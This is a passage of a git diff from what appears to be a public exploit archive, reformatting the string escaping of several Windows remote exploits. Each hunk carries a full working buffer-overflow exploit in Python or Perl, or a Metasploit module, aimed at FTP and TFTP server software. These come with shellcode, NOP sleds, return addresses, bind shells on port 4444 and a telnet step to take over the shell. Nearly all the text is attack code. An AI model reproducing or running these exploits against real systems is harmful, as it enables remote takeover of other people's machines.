-        \"\\x3f\\x2e\\x48\\x68\\x2a\\xa1\\xb7\\x88\\x55\\x6b\\xce\\x8f\\x9b\\x4f\\x82\"
-        \"\\x67\\xde\\x6f\\x34\\x2b\\x57\\x89\\x5c\\xc3\\x31\\x01\\xc9\\x21\\x66\\x9a\"
-        \"\\x6e\\x5a\\x4c\\xb6\\x27\\xcc\\xd8\\xd0\\xf0\\xf3\\xd8\\xf6\\x52\\x58\\x70\"
-        \"\\x91\\x20\\xb2\\x45\\x80\\x36\\x9f\\xed\\xcb\\x0e\\x77\\x67\\xa2\\xdd\\xe6\"
-        \"\\x78\\xef\\xb6\\x8b\\xeb\\x74\\x47\\xc2\\x17\\x23\\x10\\x83\\xe6\\x3a\\xf4\"
-        \"\\x39\\x50\\x95\\xeb\\xc0\\x04\\xde\\xa8\\x1e\\xf5\\xe1\\x31\\xd3\\x41\\xc6\"
-        \"\\x21\\x2d\\x49\\x42\\x16\\xe1\\x1c\\x1c\\xc0\\x47\\xf7\\xee\\xba\\x11\\xa4\"
-        \"\\xb8\\x2a\\xe4\\x86\\x7a\\x2d\\xe9\\xc2\\x0c\\xd1\\x5b\\xbb\\x48\\xed\\x53\"
-        \"\\x2b\\x5d\\x96\\x8e\\xcb\\xa2\\x4d\\x0b\\xfb\\xe8\\xcc\\x3d\\x94\\xb4\\x84\"
-        \"\\x7c\\xf9\\x46\\x73\\x42\\x04\\xc5\\x76\\x3a\\xf3\\xd5\\xf2\\x3f\\xbf\\x51\"
-        \"\\xee\\x4d\\xd0\\x37\\x10\\xe2\\xd1\\x1d\\x1a\\xcd\")
+        "\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
+        "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
+        "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
+        "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
+        "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
+        "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
+        "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
+        "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
+        "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
+        "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
+        "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
+        "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
+        "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
+        "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
+        "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
+        "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
+        "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
+        "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
+        "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
+        "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
+        "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
+        "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
+        "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
+        "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
+        "\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a\xcd")
     sploit = junk+espaddress+nops+shellcode
     #create socket
     conn = s.socket(s.AF_INET,s.SOCK_STREAM)
     #establish connection to server
     conn.connect((host,21))
     #post ftp user
-    conn.send(\'USER \'+fuser+\'\\r\\n\')
+    conn.send('USER '+fuser+'\r\n')
     #wait for response
     uf = conn.recv(1024)
     #post ftp password
-    conn.send(\'PASS \'+fpass+\'\\r\\n\')
+    conn.send('PASS '+fpass+'\r\n')
     #wait for response
     pf = conn.recv(1024)
     #send ftp command with sploit
-    conn.send(\'CWD \'+sploit+\'\\r\\n\')
+    conn.send('CWD '+sploit+'\r\n')
     cf = conn.recv(1024)
     #close connection
     conn.close()
diff --git a/platforms/windows/remote/3132.pl b/platforms/windows/remote/3132.pl
index 3e06b557a..c42fc26d2 100755
--- a/platforms/windows/remote/3132.pl
+++ b/platforms/windows/remote/3132.pl
@@ -3,64 +3,64 @@ use IO::Socket;
 
 if(!($ARGV[1]))
 {
- print \"Usage: tftpdwin-0-4-2.pl <target host> <port>\\n\\n\";
+ print "Usage: tftpdwin-0-4-2.pl <target host> <port>\n\n";
  exit;
 }
 
-$victim = IO::Socket::INET->new(Proto=>\'udp\',
+$victim = IO::Socket::INET->new(Proto=>'udp',
                                 PeerAddr=>$ARGV[0],
                                 PeerPort=>$ARGV[1])
-                            or die \"Cannot connect to $ARGV[0] sulla porta $ARGV[1]\";
+                            or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
 
-my $nop0=\"\\x90\"x15;
+my $nop0="\x90"x15;
 
 #8BC3           MOV EAX,EBX
 #66:05 1201     ADD AX,112
 #50             PUSH EAX
 #C3             RETN
 
-my $asm=\"\\x8b\\xc3\\x66\\x05\\x12\\x01\\x50\\xc3\";
+my $asm="\x8b\xc3\x66\x05\x12\x01\x50\xc3";
 
-my $nop=\"\\x90\"x57;
+my $nop="\x90"x57;
 
-my $nop1=\"\\x90\"x7;
+my $nop1="\x90"x7;
 
-my $eip=\"\\x42\\xfb\\x61\\x40\";# pop ebp,ret in tftpd.exe
-#my $eip=\"B\"x4;
+my $eip="\x42\xfb\x61\x40";# pop ebp,ret in tftpd.exe
+#my $eip="B"x4;
 
 #A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
 #1)bind port, in this exploit is 4444 in the original shellcode was 6666
 #2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host
 $shellcode = 
-\"\\x59\\x81\\xc9\\xd3\\x62\\x30\\x20\\x41\\x43\\x4d\\x64\".
-\"\\x64\\x99\\x96\\x8D\\x7E\\xE8\\x64\\x8B\\x5A\\x30\\x8B\\x4B\\x0C\\x8B\\x49\\x1C\".
-\"\\x8B\\x09\\x8B\\x69\\x08\\xB6\\x03\\x2B\\xE2\\x66\\xBA\\x33\\x32\\x52\\x68\\x77\".
-\"\\x73\\x32\\x5F\\x54\\xAC\\x3C\\xD3\\x75\\x06\\x95\\xFF\\x57\\xF4\\x95\\x57\\x60\".
-\"\\x8B\\x45\\x3C\\x8B\\x4C\\x05\\x78\\x03\\xCD\\x8B\\x59\\x20\\x03\\xDD\\x33\\xFF\".
-\"\\x47\\x8B\\x34\\xBB\\x03\\xF5\\x99\\xAC\\x34\\x71\\x2A\\xD0\\x3C\\x71\\x75\\xF7\".
-\"\\x3A\\x54\\x24\\x1C\\x75\\xEA\\x8B\\x59\\x24\\x03\\xDD\\x66\\x8B\\x3C\\x7B\\x8B\".
-\"\\x59\\x1C\\x03\\xDD\\x03\\x2C\\xBB\\x95\\x5F\\xAB\\x57\\x61\\x3B\\xF7\\x75\\xB4\".
-\"\\x5E\\x54\\x6A\\x02\\xAD\\xFF\\xD0\\x88\\x46\\x13\\x8D\\x48\\x30\\x8B\\xFC\\xF3\".
-\"\\xAB\\x40\\x50\\x40\\x50\\xAD\\xFF\\xD0\\x95\\xB8\\x02\\xFF\\x11\\x5c\\x32\\xE4\".
-\"\\x50\\x54\\x55\\xAD\\xFF\\xD0\\x85\\xC0\\x74\\xF8\\xFE\\x44\\x24\\x2D\\xFE\\x44\".
-\"\\x24\\x2c\\x83\\xEF\\x6C\\xAB\\xAB\\xAB\\x58\\x54\\x54\\x50\\x50\\x50\\x54\\x50\".
-\"\\x50\\x56\\x50\\xFF\\x56\\xE4\\xFF\\x56\\xE8\";
+"\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64".
+"\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C".
+"\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77".
+"\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60".
+"\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF".
+"\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7".
+"\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B".
+"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4".
+"\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3".
+"\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4".
+"\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44".
+"\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50".
+"\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8";
 
-$exploit = \"\\x00\\x01\" . $nop0 .$asm.$nop. $shellcode. $nop1 .$eip. \"\\x00\\x6e\\x65\\x74\\x61\\x73\\x63\\x69\\x69\\x00\";
+$exploit = "\x00\x01" . $nop0 .$asm.$nop. $shellcode. $nop1 .$eip. "\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";
 
 print $victim $exploit;
 
-print \" + Malicious request sent ...\\n\";
+print " + Malicious request sent ...\n";
 
 sleep(2);
 
-print \"Done.\\n\";
+print "Done.\n";
 
 close($victim);
 $host = $ARGV[0];
-print \" + connect to 4444 port of $host ...\\n\";
+print " + connect to 4444 port of $host ...\n";
 sleep(3);
-system(\"telnet $host 4444\");
+system("telnet $host 4444");
 exit;
 
 # milw0rm.com [2007-01-15]
diff --git a/platforms/windows/remote/3140.pl b/platforms/windows/remote/3140.pl
index e0af7fce5..f01bc0e73 100755
--- a/platforms/windows/remote/3140.pl
+++ b/platforms/windows/remote/3140.pl
@@ -21,8 +21,8 @@
 #          		You are responsible for yourself for what you do with this code.
 #
 #
-#	    Note:	After executing the exploit You will get \"Cannot login User or password not correct.\"
-#			That doesn\'t mean exploit failed whenever you click on Sami FTP server it will crash 
+#	    Note:	After executing the exploit You will get "Cannot login User or password not correct."
+#			That doesn't mean exploit failed whenever you click on Sami FTP server it will crash 
 #			resulting in the execution of calc.exe and will execute whenever the SAMI FTP server 
 #			restarts until it is reinstalled.
 
@@ -30,30 +30,30 @@
 use Net::FTP;
 
 
-print \"Coded by UmZ! umz32.dll@gmail.com\\n\";
-print \"http://www.secure-bytes.com/exploits/\\n\";
+print "Coded by UmZ! umz32.dll@gmail.com\n";
+print "http://www.secure-bytes.com/exploits/\n";
 	
-$ftp = Net::FTP->new(\"192.168.100.250\", Debug => 0) or die \"Cannot connect : $@\";
+$ftp = Net::FTP->new("192.168.100.250", Debug => 0) or die "Cannot connect : $@";
 
-my $msg =\"\\x90\" x596;      #140
-my $msg2 =\"B\"x484;
-my $shellcode =  \"\\x31\\xc9\\x83\\xe9\\xdb\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xd8\".
-		 \"\\x22\\x72\\xe4\\x83\\xeb\\xfc\\xe2\\xf4\\x24\\xca\\x34\\xe4\\xd8\\x22\\xf9\\xa1\".
-		 \"\\xe4\\xa9\\x0e\\xe1\\xa0\\x23\\x9d\\x6f\\x97\\x3a\\xf9\\xbb\\xf8\\x23\\x99\\x07\".
-		 \"\\xf6\\x6b\\xf9\\xd0\\x53\\x23\\x9c\\xd5\\x18\\xbb\\xde\\x60\\x18\\x56\\x75\\x25\".
-		 \"\\x12\\x2f\\x73\\x26\\x33\\xd6\\x49\\xb0\\xfc\\x26\\x07\\x07\\x53\\x7d\\x56\\xe5\".
-		 \"\\x33\\x44\\xf9\\xe8\\x93\\xa9\\x2d\\xf8\\xd9\\xc9\\xf9\\xf8\\x53\\x23\\x99\\x6d\".
-		 \"\\x84\\x06\\x76\\x27\\xe9\\xe2\\x16\\x6f\\x98\\x12\\xf7\\x24\\xa0\\x2d\\xf9\\xa4\".
-		 \"\\xd4\\xa9\\x02\\xf8\\x75\\xa9\\x1a\\xec\\x31\\x29\\x72\\xe4\\xd8\\xa9\\x32\\xd0\".
-		 \"\\xdd\\x5e\\x72\\xe4\\xd8\\xa9\\x1a\\xd8\\x87\\x13\\x84\\x84\\x8e\\xc9\\x7f\\x8c\".
-		 \"\\x28\\xa8\\x76\\xbb\\xb0\\xba\\x8c\\x6e\\xd6\\x75\\x8d\\x03\\x30\\xcc\\x8d\\x1b\".
-		 \"\\x27\\x41\\x13\\x88\\xbb\\x0c\\x17\\x9c\\xbd\\x22\\x72\\xe4\";
+my $msg ="\x90" x596;      #140
+my $msg2 ="B"x484;
+my $shellcode =  "\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8".
+		 "\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1".
+		 "\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07".
+		 "\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25".
+		 "\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5".
+		 "\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d".
+		 "\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4".
+		 "\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0".
+		 "\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c".
+		 "\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b".
+		 "\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4";
 
-my $test= \"\\x90\" x 108;
+my $test= "\x90" x 108;
 
-my $msg1=$msg. \"\\x70\\xFD\\x8B\\x01\".\"\\x96\\x64\\xF8\\x77\". $test .  $shellcode. \"\\r\\n\";
+my $msg1=$msg. "\x70\xFD\x8B\x01"."\x96\x64\xF8\x77". $test .  $shellcode. "\r\n";
 
-$ftp->login($msg1.\"\\r\\n\\0\",\"umz\") or die \"Cannot login \", $ftp->message;
+$ftp->login($msg1."\r\n\0","umz") or die "Cannot login ", $ftp->message;
 
 $ftp->quit;
 
diff --git a/platforms/windows/remote/3170.pm b/platforms/windows/remote/3170.pm
index 1cbe9a36b..e07c6c977 100755
--- a/platforms/windows/remote/3170.pm
+++ b/platforms/windows/remote/3170.pm
@@ -1,7 +1,7 @@
 package Msf::Exploit::3com_tftp_long_mode;
 
 use strict;
-use base \"Msf::Exploit\";
+use base "Msf::Exploit";
 use Pex::Text;
 use IO::Socket;
 
@@ -11,92 +11,92 @@ my $advanced =
 
 my $info =
   {
-	\'Name\'           => \'TFTP Server 3CTftpSvc Buffer Overflow Vulnerability\',
-	\'Version\'        => \'$ 1.0 $\',
-	\'Authors\'        => [\'Enseirb <vincenty [at] enseirb.fr>\', ],
-	\'Description\'    =>
+	'Name'           => 'TFTP Server 3CTftpSvc Buffer Overflow Vulnerability',
+	'Version'        => '$ 1.0 $',
+	'Authors'        => ['Enseirb <vincenty [at] enseirb.fr>', ],
+	'Description'    =>
 	  Pex::Text::Freeform(qq{
 		This vulnerability is caused due to a boundary error during the processing of TFTP Read/Write request packet types. This can be exploited to cause a stack-based buffer overflow by sending a specially crafted packet with an overly long mode field (more than 460 bytes).
                             }),
 
-	\'Arch\'           => [ \'x86\' ],
-	\'OS\'             => [ \'win32\' ],
-	\'Priv\'           => 0,
+	'Arch'           => [ 'x86' ],
+	'OS'             => [ 'win32' ],
+	'Priv'           => 0,
 
-	\'AutoOpts\'       => { \'EXITFUNC\' => \'seh\' },
-	\'UserOpts\'       =>
+	'AutoOpts'       => { 'EXITFUNC' => 'seh' },
+	'UserOpts'       =>
 	  {
-		\'RHOST\'  => [ 1, \'ADDR\', \'The TFTP target adress\', \"127.0.0.1\" ],
-		\'RPORT\'  => [ 0, \'PORT\', \'The TFTP target port\', 69 ],
+		'RHOST'  => [ 1, 'ADDR', 'The TFTP target adress', "127.0.0.1" ],
+		'RPORT'  => [ 0, 'PORT', 'The TFTP target port', 69 ],
 	  },	
 
-	\'Payload\'        =>
+	'Payload'        =>
 	  {
-		\'Space\'    => 344,
-		\'BadChars\' => \"\\x00\",
+		'Space'    => 344,
+		'BadChars' => "\x00",
 	  },
 
-	\'Refs\'           =>
+	'Refs'           =>
 	  [
-		[\'URL\', \'http://www.securityfocus.com/bid/21301\'],
-		[\'CVE\', \'2006-6183\'],
-		[\'URL\', \'http://secunia.com/advisories/23113\'],
-		[\'URL\', \'http://www.securityfocus.com/archive/1/452754\'],		
+		['URL', 'http://www.securityfocus.com/bid/21301'],
+		['CVE', '2006-6183'],
+		['URL', 'http://secunia.com/advisories/23113'],
+		['URL', 'http://www.securityfocus.com/archive/1/452754'],		
 	  ],
 
-	\'DefaultTarget\'  => 0,
-	\'Targets\'        =>
+	'DefaultTarget'  => 0,
+	'Targets'        =>
 	  [
-		[ \'0 - Windows XP SP2 ENG\', 0x77d4e23b ], #or 0x77bc2063
-	        [ \'1 - Windows XP SP1 FR\', 0x77d8117b ],
-	        [ \'2 - Windows XP SP2 FR\', 0x77d8d9af ],
+		[ '0 - Windows XP SP2 ENG', 0x77d4e23b ], #or 0x77bc2063
+	        [ '1 - Windows XP SP1 FR', 0x77d8117b ],
+	        [ '2 - Windows XP SP2 FR', 0x77d8d9af ],
 	  ],
 
-	\'Keys\'           => [ \'3com\' ],
+	'Keys'           => [ '3com' ],
 
-	\'DisclosureDate\' => \'Nov 27 2006\',
+	'DisclosureDate' => 'Nov 27 2006',
   };
 
 sub new {
 	my $class = shift;
-	my $self = $class->SUPER::new({\'Info\' => $info, \'Advanced\' => $advanced}, @_);
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
 	return($self);
 }
 
 sub Exploit 
 {
     my $self = shift;
-    my $target_idx  = $self->GetVar(\'TARGET\');
-    my $target_host = $self->GetVar(\'RHOST\');
-    my $target_port = $self->GetVar(\'RPORT\');
-    my $shellcode = $self->GetVar(\'EncodedPayload\')->Payload;
+    my $target_idx  = $self->GetVar('TARGET');
+    my $target_host = $self->GetVar('RHOST');
+    my $target_port = $self->GetVar('RPORT');
+    my $shellcode = $self->GetVar('EncodedPayload')->Payload;
     my $target = $self->Targets->[$target_idx];
 
-    my $buff = \"\\x00\\x02\"; # for a WRQ (WriteReQuest) (or \"\\x00\\x01\" for a RRQ)
-    $buff .= \"filename_string\";
-    $buff .= \"\\x00\";
+    my $buff = "\x00\x02"; # for a WRQ (WriteReQuest) (or "\x00\x01" for a RRQ)
+    $buff .= "filename_string";
+    $buff .= "\x00";
     $buff .= $self->MakeNops(129) . $shellcode; 
-    $buff .= pack(\'V\',$target->[1]);
-    $buff .= \"\\x00\";
+    $buff .= pack('V',$target->[1]);
+    $buff .= "\x00";
 
-    $self->PrintLine(\'[+] Try to connect... \' . $target_host . \':\' . $target_port);
+    $self->PrintLine('[+] Try to connect... ' . $target_host . ':' . $target_port);
 
     my $s = Msf::Socket::Udp->new
 	(
-	 \'PeerAddr\'  => $target_host,
-	 \'PeerPort\'  => $target_port,	 
+	 'PeerAddr'  => $target_host,
+	 'PeerPort'  => $target_port,	 
 	);
     
     if ($s->IsError) {
-	$self->PrintLine(\'[-] Error creating socket: \' . $s->GetError);
+	$self->PrintLine('[-] Error creating socket: ' . $s->GetError);
 	return;
     }
  
-    $self->PrintLine(\'[+] Connected!\');
-    $self->PrintLine(\'[+] Sending exploit...\');
+    $self->PrintLine('[+] Connected!');
+    $self->PrintLine('[+] Sending exploit...');
 
     $s->Send($buff);
-    $self->PrintLine(\'[+] Exploit sent!\');
+    $self->PrintLine('[+] Exploit sent!');
     $s->Close();
 
     return;
diff --git a/platforms/windows/remote/31789.py b/platforms/windows/remote/31789.py
index e47fb3ba2..ca9c1ca40 100755
--- a/platforms/windows/remote/31789.py
+++ b/platforms/windows/remote/31789.py
@@ -9,58 +9,58 @@
 import socket
 import datetime
 
-\"\"\"
+"""
 You have to take into account your IP addr and servers date (if using NAT, check external IP) as buffer starts like the following:
 2014/2/20 [00:40] (00320) 127.0.0.100> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
-\"\"\"
+"""
 
-host = \'192.168.213.10\'
+host = '192.168.213.10'
 
-d = str(datetime.datetime.today()).split()[0].split(\'-\') # You should ideally consider servers date here
+d = str(datetime.datetime.today()).split()[0].split('-') # You should ideally consider servers date here
 for i in range(len(d)): d[i] = str(int(d[i]))
-d = \'/\'.join(d)	# Finally we got the date
+d = '/'.join(d)	# Finally we got the date
 
-# msfvenom -p windows/shell_bind_tcp -b \'\\x00\\x0a\\x0d\'
+# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d'
 shellcode = (
-\"\\xda\\xdb\\xd9\\x74\\x24\\xf4\\xbe\\xb5\\x40\\x16\\xb6\\x5b\\x2b\\xc9\" +
-\"\\xb1\\x56\\x31\\x73\\x18\\x83\\xeb\\xfc\\x03\\x73\\xa1\\xa2\\xe3\\x4a\" +
-\"\\x21\\xab\\x0c\\xb3\\xb1\\xcc\\x85\\x56\\x80\\xde\\xf2\\x13\\xb0\\xee\" +
-\"\\x71\\x71\\x38\\x84\\xd4\\x62\\xcb\\xe8\\xf0\\x85\\x7c\\x46\\x27\\xab\" +
-\"\\x7d\\x66\\xe7\\x67\\xbd\\xe8\\x9b\\x75\\x91\\xca\\xa2\\xb5\\xe4\\x0b\" +
-\"\\xe2\\xa8\\x06\\x59\\xbb\\xa7\\xb4\\x4e\\xc8\\xfa\\x04\\x6e\\x1e\\x71\" +
-\"\\x34\\x08\\x1b\\x46\\xc0\\xa2\\x22\\x97\\x78\\xb8\\x6d\\x0f\\xf3\\xe6\" +
-\"\\x4d\\x2e\\xd0\\xf4\\xb2\\x79\\x5d\\xce\\x41\\x78\\xb7\\x1e\\xa9\\x4a\" +
-\"\\xf7\\xcd\\x94\\x62\\xfa\\x0c\\xd0\\x45\\xe4\\x7a\\x2a\\xb6\\x99\\x7c\" +
-\"\\xe9\\xc4\\x45\\x08\\xec\\x6f\\x0e\\xaa\\xd4\\x8e\\xc3\\x2d\\x9e\\x9d\" +
-\"\\xa8\\x3a\\xf8\\x81\\x2f\\xee\\x72\\xbd\\xa4\\x11\\x55\\x37\\xfe\\x35\" +
-\"\\x71\\x13\\xa5\\x54\\x20\\xf9\\x08\\x68\\x32\\xa5\\xf5\\xcc\\x38\\x44\" +
-\"\\xe2\\x77\\x63\\x01\\xc7\\x45\\x9c\\xd1\\x4f\\xdd\\xef\\xe3\\xd0\\x75\" +
-\"\\x78\\x48\\x99\\x53\\x7f\\xaf\\xb0\\x24\\xef\\x4e\\x3a\\x55\\x39\\x95\" +
-\"\\x6e\\x05\\x51\\x3c\\x0e\\xce\\xa1\\xc1\\xdb\\x41\\xf2\\x6d\\xb3\\x21\" +
-\"\\xa2\\xcd\\x63\\xca\\xa8\\xc1\\x5c\\xea\\xd2\\x0b\\xeb\\x2c\\x1d\\x6f\" +
-\"\\xb8\\xda\\x5c\\x8f\\x2f\\x47\\xe8\\x69\\x25\\x67\\xbc\\x22\\xd1\\x45\" +
-\"\\x9b\\xfa\\x46\\xb5\\xc9\\x56\\xdf\\x21\\x45\\xb1\\xe7\\x4e\\x56\\x97\" +
-\"\\x44\\xe2\\xfe\\x70\\x1e\\xe8\\x3a\\x60\\x21\\x25\\x6b\\xeb\\x1a\\xae\" +
-\"\\xe1\\x85\\xe9\\x4e\\xf5\\x8f\\x99\\xf3\\x64\\x54\\x59\\x7d\\x95\\xc3\" +
-\"\\x0e\\x2a\\x6b\\x1a\\xda\\xc6\\xd2\\xb4\\xf8\\x1a\\x82\\xff\\xb8\\xc0\" +
-\"\\x77\\x01\\x41\\x84\\xcc\\x25\\x51\\x50\\xcc\\x61\\x05\\x0c\\x9b\\x3f\" +
-\"\\xf3\\xea\\x75\\x8e\\xad\\xa4\\x2a\\x58\\x39\\x30\\x01\\x5b\\x3f\\x3d\" +
-\"\\x4c\\x2d\\xdf\\x8c\\x39\\x68\\xe0\\x21\\xae\\x7c\\x99\\x5f\\x4e\\x82\" +
-\"\\x70\\xe4\\x7e\\xc9\\xd8\\x4d\\x17\\x94\\x89\\xcf\\x7a\\x27\\x64\\x13\" +
-\"\\x83\\xa4\\x8c\\xec\\x70\\xb4\\xe5\\xe9\\x3d\\x72\\x16\\x80\\x2e\\x17\" +
-\"\\x18\\x37\\x4e\\x32\")
+"\xda\xdb\xd9\x74\x24\xf4\xbe\xb5\x40\x16\xb6\x5b\x2b\xc9" +
+"\xb1\x56\x31\x73\x18\x83\xeb\xfc\x03\x73\xa1\xa2\xe3\x4a" +
+"\x21\xab\x0c\xb3\xb1\xcc\x85\x56\x80\xde\xf2\x13\xb0\xee" +
+"\x71\x71\x38\x84\xd4\x62\xcb\xe8\xf0\x85\x7c\x46\x27\xab" +
+"\x7d\x66\xe7\x67\xbd\xe8\x9b\x75\x91\xca\xa2\xb5\xe4\x0b" +
+"\xe2\xa8\x06\x59\xbb\xa7\xb4\x4e\xc8\xfa\x04\x6e\x1e\x71" +
+"\x34\x08\x1b\x46\xc0\xa2\x22\x97\x78\xb8\x6d\x0f\xf3\xe6" +
+"\x4d\x2e\xd0\xf4\xb2\x79\x5d\xce\x41\x78\xb7\x1e\xa9\x4a" +
+"\xf7\xcd\x94\x62\xfa\x0c\xd0\x45\xe4\x7a\x2a\xb6\x99\x7c" +
+"\xe9\xc4\x45\x08\xec\x6f\x0e\xaa\xd4\x8e\xc3\x2d\x9e\x9d" +
+"\xa8\x3a\xf8\x81\x2f\xee\x72\xbd\xa4\x11\x55\x37\xfe\x35" +
+"\x71\x13\xa5\x54\x20\xf9\x08\x68\x32\xa5\xf5\xcc\x38\x44" +
+"\xe2\x77\x63\x01\xc7\x45\x9c\xd1\x4f\xdd\xef\xe3\xd0\x75" +
+"\x78\x48\x99\x53\x7f\xaf\xb0\x24\xef\x4e\x3a\x55\x39\x95" +
+"\x6e\x05\x51\x3c\x0e\xce\xa1\xc1\xdb\x41\xf2\x6d\xb3\x21" +
+"\xa2\xcd\x63\xca\xa8\xc1\x5c\xea\xd2\x0b\xeb\x2c\x1d\x6f" +
+"\xb8\xda\x5c\x8f\x2f\x47\xe8\x69\x25\x67\xbc\x22\xd1\x45" +
+"\x9b\xfa\x46\xb5\xc9\x56\xdf\x21\x45\xb1\xe7\x4e\x56\x97" +
+"\x44\xe2\xfe\x70\x1e\xe8\x3a\x60\x21\x25\x6b\xeb\x1a\xae" +
+"\xe1\x85\xe9\x4e\xf5\x8f\x99\xf3\x64\x54\x59\x7d\x95\xc3" +
+"\x0e\x2a\x6b\x1a\xda\xc6\xd2\xb4\xf8\x1a\x82\xff\xb8\xc0" +
+"\x77\x01\x41\x84\xcc\x25\x51\x50\xcc\x61\x05\x0c\x9b\x3f" +
+"\xf3\xea\x75\x8e\xad\xa4\x2a\x58\x39\x30\x01\x5b\x3f\x3d" +
+"\x4c\x2d\xdf\x8c\x39\x68\xe0\x21\xae\x7c\x99\x5f\x4e\x82" +
+"\x70\xe4\x7e\xc9\xd8\x4d\x17\x94\x89\xcf\x7a\x27\x64\x13" +
+"\x83\xa4\x8c\xec\x70\xb4\xe5\xe9\x3d\x72\x16\x80\x2e\x17" +
+"\x18\x37\x4e\x32")
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((host, 21))
 
-nop = \'\\x90\'*50
-eip = \'\\x53\\x93\\x42\\x7E\' # EIP = 7E429353; JMP ESP in USER32.dll
+nop = '\x90'*50
+eip = '\x53\x93\x42\x7E' # EIP = 7E429353; JMP ESP in USER32.dll
 myip = s.getsockname()[0]
